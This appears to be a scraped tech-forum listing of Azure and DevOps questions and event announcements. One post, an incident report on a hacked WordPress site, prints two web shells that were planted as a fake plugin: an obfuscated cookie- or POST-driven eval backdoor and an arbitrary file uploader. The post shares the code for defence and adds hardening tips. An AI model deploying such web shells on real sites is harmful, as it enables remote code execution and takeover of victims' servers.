CI/CD pipeline permissions
We have many DevOps projects; one per software project. Is it possible to add a user or a group organization-wide or collection-wide, so they can manage the build & release pipelines for every project, without adding them to each project explicitly? The project collection has a role for build administrators, but none for release administrators.689Views0likes1CommentUsers asked for 2nd MFA method
Hi there, starting today a couple of users reported that, seemingly out of the blue, they're being asked to configure a second method for their MFA setup. For example, if a user has configured to to use MSFT Authenticator app, he will be asked to provide an additional method. This doesn't seem to be widespread yet and we couldn't reproduce thus far. Perhaps someone of you knows what could be causing this. Thanks.Solved2.3KViews0likes3CommentsAzure Bastion - News Comics
You are a Cloud lover? But you prefer Azure? Learning with fun? And most of all, you like establishing connections? (link removed by moderator) If you want to deep dive, do not hesitate to visit the official documentation on the Microsoft website: https://learn.microsoft.com/en-us/azure/bastion/bastion-overview (link removed by moderator)1.9KViews1like2CommentsAzure Sentinel Webinar: Threat Hunting
Interested in going threat hunting with Azure Sentinel? Check out our upcoming webinar. Details and registration at https://aka.ms/AzureSentinelWebinar. The webinar will take place on Wednesday, September 18, 2019 at 09:00 PT / 12:00 ET / 16:00 GMT. Afterward, we will post recordings of the webinar at https://aka.ms/AzureSentinelRecordings. To stay informed about future webinars and other events, join our Security Community at https://aka.ms/SecurityCommunity.888Views1like0CommentsMeetup: Deep dive into the new Azure Sentinel service!
If you are based in London or will be there on October 23, our Azure Sentinel team will co-host a free “Deep dive into the new Azure Sentinel service” meetup in the month of October. Meetup name: Deep dive into the new Azure Sentinel service Cost: Free Date: October 23rd, 2019 Time and Duration: 18:00 – 21:00 Location: The Microsoft Reactor London, 70 Wilson St. - London, UK Registration: https://lnkd.in/gvRTgpz There is a maximum capacity of 100 attendees, so if interested we suggest registering now.1.3KViews1like0CommentsSecurity on Azure Devops Self Hosted agent
Hello, Today I have discovered that is possible from the pipeline to deploy software directly on the agents without any kind of authentication, in my case I was able to deploy docker directly on a self-hosted agent by just using a bash script on the pipeline. Is it possible to deny this kind of deployments on a self-hosted agent from the pipeline without impacting any other deployments, pipelines, or releases? From the security perspective, it poses a risk, someone that has access to the pipelines deploy un-wanted software on an agent.Solved3.8KViews0likes1CommentMalware Wordpress on Azure
Recently received a security alert on a wordpress webapp running on Azure: 1. There was a non-recognized authentication as admin user 2. The user Uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php 3. The user performed a "test" through the "plugin" Example of the code map.php: <?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}} Example of code apikey.php: <?php /** * @package api key */ /* Plugin Name: api key */ if ("hello"==$_GET["test"]) { echo "testtrue"; } if(is_uploaded_file($_FILES["filename"]["tmp_name"])) { move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]); echo "true"; } Image of the "Plugin" on the wordpress site: Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a Wordpress installation even using some tools like the sucuri scanner tool online. Recommendations: . Enable Sucuri plugin on your WP . Enable WAF v2 on your webapp . If possible isolate your resource using App Service Environment . Harden NSG(s) .Perform a SSL Test on your web app If you have any other tip recommendation please share!1.9KViews0likes2CommentsHow to redirect from one URL to another URL adding a security token?
Iwould like to know, if there are any way with Azure Functions, Proxy... to redirect from one URL to another URL adding the accessToken?. I'm looking for something like this:https://myexample.azuresite.net-> redirect + adding security ->https://www.myexample.com/oauthCallback.html?token= Could you help me? Regards1.4KViews0likes0CommentsExecutive Customer Meetings (Security) at Microsoft Ignite the Tour in Washington, DC
We are providing the opportunity for US GCC High customers to request on-site meetings with Microsoft Cloud Security General Manager, Asaf Kashi, during Microsoft Ignite the Tour in Washington, DC on Feb 6-7, 2020. Details and signup here!962Views0likes1Commentone Traffic manager and multiple DNS mapping (pls need clarification on how security is ensured)
Hi Team, I feel really strange on how Azure Traffic Manager allowing traffic from multiple Custom domains with just adding a CNAME record of traffic manager to them without enforcing any validation of DNS from Azure end. May be I am wrong, but let me explain in detail: Here's my setup: Traffic Manager \_____ App Gateway(East) & App Gateway(West) \_WebApp (East) & \_WebApp(West) A HA setup with applications in East & West. I've bought Domain from GoDaddy & I added CNAME record pointing to Traffic manager (pqr-tm.trafficmanager.net). I did no additional steps for Domain validation from Azure. After the DNS propogation happend, the other day when I tired my Custom Domain (lets say pqr.com), it routed to my WebApp as expected as per CNAME record. Now, when I typed www.prq.com in https://digwebinterface.com I could see, it resolved first to "traffic manager" (it clearly displaying my traffic manager name), then to Application Gateway DNS and then to Application Gateway Public IP. Then my friend said, I'll do a trick, I'll get into your site without my notice. Here's what he did: he has Domain in Yahoo. lets say - xyz.com he opened his Yahoo account, went to DNS settings, and in Forward URL option, he kept my traffic manager DNS name which is clearly appearing in https://digwebinterface.com by just typing my website www.prq.com in it. To my surprise, with in a minute, when he type xyz.com in browser, my WebApp started rending page. So, I thought where is security? Here's my point: https://digwebinterface.com -- is publicly available by typing the site name, any one can get Traffic manager URL (if the setup includes it) then, just by keeping CNAME in their forward URL, if they are able to map my site....where is the security? or Am I missed any step in Traffic manager which binds My Domain to it and If any others tries to point their domain to my traffic manager, it rejects? Pls help!! I've a strong feeling that, there will be tightening point, which I am not aware of. Pls guide Guru's :) Thanks, Kiran4.4KViews0likes3Comments